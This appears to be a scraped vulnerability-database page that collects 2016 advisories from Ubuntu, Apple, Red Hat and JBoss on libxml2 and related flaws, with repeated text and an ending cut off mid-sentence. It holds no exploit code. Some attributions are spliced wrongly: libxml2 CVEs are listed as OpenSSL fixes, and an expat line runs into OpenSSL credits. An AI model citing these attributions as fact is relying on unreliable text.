It was discovered that libxml2 would load certain XML external entities. (CVE-2016-4449)
Gustavo Grieco discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-4483)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libxml2 2.9.3+dfsg1-1ubuntu0.1
Ubuntu 15.10: libxml2 2.9.2+zdfsg1-4ubuntu0.4
Ubuntu 14.04 LTS: libxml2 2.9.1+dfsg1-3ubuntu4.8
Ubuntu 12.04 LTS: libxml2 2.7.8.dfsg-5.1ubuntu4.15
After a standard system update you need to reboot your computer to make all the necessary changes.
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-1 iOS 9.3
iOS 9.3 is now available and addresses the following:
AppleUSBNetworking Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
FontParser Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to bypass code signing Description: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed through improved permission validation. CVE-ID CVE-2016-1751 : Eric Monti of Square Mobile Security
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaça
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
LaunchServices Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to modify events from other applications Description: An event handler validation issue existed in the XPC Services API. This issue was addressed through improved message validation. CVE-ID CVE-2016-1760 : Proteas of Qihoo 360 Nirvan Team
libxml2 Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may auto-fill text into other Message threads Description: An issue existed in the parsing of SMS URLs. This issue was addressed through improved URL validation. CVE-ID CVE-2016-1763 : CityTog
Messages Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Profiles Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An untrusted MDM profile may be incorrectly displayed as verified Description: A certificate validation issue existed in MDM profiles. This was addressed through additional checks. CVE-ID CVE-2016-1766 : Taylor Boyko working with Trend Micro's Zero Day Initiative (ZDI)
Security Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
TrueTypeScaler Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1778 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1783 : Mihai Parparita of Google
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: An issue existed in the handling of attachment URLs. This issue was addressed through improved URL handling. CVE-ID CVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc.
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: A hidden web page may be able to access device- orientation and device-motion data. This issue was addressed by suspending the availability of this data when the web view is hidden. CVE-ID CVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, and Feng Hao of the School of Computing Science, Newcastle University, UK
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may reveal a user's current location Description: An issue existed in the parsing of geolocation requests. This was addressed through improved validation of the security origin for geolocation requests. CVE-ID CVE-2016-1779 : xisigr of Tencent's Xuanwu Lab (http://www.tencent.com)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may be able to access restricted ports on arbitrary servers Description: A port redirection issue was addressed through additional port validation. CVE-ID CVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit Technologies Co.,Ltd.
WebKit History Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A resource exhaustion issue was addressed through improved input validation. CVE-ID CVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and 李普君 of 无声信息技术PKAV Team (PKAV.net)
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: Redirect responses may have allowed a malicious website to display an arbitrary URL and read cached contents of the destination origin. This issue was addressed through improved URL display logic. CVE-ID CVE-2016-1786 : ma.la of LINE Corporation
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may exfiltrate data cross-origin Description: A caching issue existed with character encoding. This was addressed through additional request checking. CVE-ID CVE-2016-1785 : an anonymous researcher
Wi-Fi Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "9.3 ".
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
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Safari Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 to v10.11.3 Impact: Visiting a malicious website may lead to user interface spoofing Description: An issue existed where the text of a dialog included page-supplied text. CVE-ID CVE-2016-1786 : ma.la of LINE Corporation
Installation note:
Safari 9.1 may be obtained from the Mac App Store. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6.
Security Fix(es):
-
This update fixes several flaws in OpenSSL. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6
Show details on source website{
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"description": {
"_id": null,
"data": "The xmlNextChar function in libxml2 before 2.9.4 allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted XML document. libxml2 is prone to multiple memory-corruption vulnerabilities. \nA remote attacker can leverage these issues to execute arbitrary code in the context of the user running the application. Failed exploit attempts may result in a denial-of-service condition. Apple iOS, OS X, Safari, tvOS and watchOS are all products of Apple Inc. in the United States. Apple iOS is a set of operating systems developed for mobile devices; Apple OS X is a set of dedicated operating systems developed for Mac computers; and the default browser that comes with the iOS operating system; tvOS is a smart TV operating system; watchOS is a smart watch operating system. A security vulnerability exists in libxml2 of several Apple products. The following products and versions are affected: Apple iOS versions prior to 9.3, OS X versions prior to 10.11.4, Safari versions prior to 9.1, tvOS versions prior to 9.2, and watchOS versions prior to 2.2. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n(CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447,\nCVE-2016-4448, CVE-2016-4449)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all applications linked to the libxml2\nlibrary must be restarted, or the system rebooted. \n\n5. Package List:\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\ni386:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-python-2.7.6-21.el6_8.1.i686.rpm\n\nppc64:\nlibxml2-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.ppc64.rpm\n\ns390x:\nlibxml2-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-python-2.7.6-21.el6_8.1.s390x.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-static-2.7.6-21.el6_8.1.i686.rpm\n\nppc64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.ppc64.rpm\n\ns390x:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-static-2.7.6-21.el6_8.1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\ni386:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-python-2.7.6-21.el6_8.1.i686.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-static-2.7.6-21.el6_8.1.i686.rpm\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.3.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.3.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-1762\nhttps://access.redhat.com/security/cve/CVE-2016-1833\nhttps://access.redhat.com/security/cve/CVE-2016-1834\nhttps://access.redhat.com/security/cve/CVE-2016-1835\nhttps://access.redhat.com/security/cve/CVE-2016-1836\nhttps://access.redhat.com/security/cve/CVE-2016-1837\nhttps://access.redhat.com/security/cve/CVE-2016-1838\nhttps://access.redhat.com/security/cve/CVE-2016-1839\nhttps://access.redhat.com/security/cve/CVE-2016-1840\nhttps://access.redhat.com/security/cve/CVE-2016-3627\nhttps://access.redhat.com/security/cve/CVE-2016-3705\nhttps://access.redhat.com/security/cve/CVE-2016-4447\nhttps://access.redhat.com/security/cve/CVE-2016-4448\nhttps://access.redhat.com/security/cve/CVE-2016-4449\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXa8B8XlSAg2UNWIIRAh9ZAJ99xgPhOaIopIxmynm+vlDcmw4jFACeLvTm\nZsVLEgJAF0Zt6xZVzqvVW7U=\n=fREV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. From: Marc Deslauriers \u003cmarc.deslauriers@canonical.com\u003e\nReply-To: Ubuntu Security \u003csecurity@ubuntu.com\u003e\nTo: ubuntu-security-announce@lists.ubuntu.com\nMessage-ID: \u003c5755B7E3.5040103@canonical.com\u003e\nSubject: [USN-2994-1] libxml2 vulnerabilities\n\n\n\n\n============================================================================\nUbuntu Security Notice USN-2994-1\nJune 06, 2016\n\nlibxml2 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 15.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in libxml2. (CVE-2015-8806, CVE-2016-2073,\nCVE-2016-3627, CVE-2016-3705, CVE-2016-4447)\n\nIt was discovered that libxml2 incorrectly handled certain malformed\ndocuments. \n(CVE-2016-1762, CVE-2016-1834)\n\nMateusz Jurczyk discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-1833, CVE-2016-1838, CVE-2016-1839)\n\nWei Lei and Liu Yang discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-1835, CVE-2016-1837)\n\nWei Lei and Liu Yang discovered that libxml2 incorrectly handled certain\nmalformed documents. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 15.10 and\nUbuntu 16.04 LTS. (CVE-2016-1836)\n\nKostya Serebryany discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-1840)\n\nIt was discovered that libxml2 would load certain XML external entities. (CVE-2016-4449)\n\nGustavo Grieco discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2016-4483)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libxml2 2.9.3+dfsg1-1ubuntu0.1\n\nUbuntu 15.10:\n libxml2 2.9.2+zdfsg1-4ubuntu0.4\n\nUbuntu 14.04 LTS:\n libxml2 2.9.1+dfsg1-3ubuntu4.8\n\nUbuntu 12.04 LTS:\n libxml2 2.7.8.dfsg-5.1ubuntu4.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u2. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-1 iOS 9.3\n\niOS 9.3 is now available and addresses the following:\n\nAppleUSBNetworking\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nFontParser\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Opening a maliciously crafted PDF file 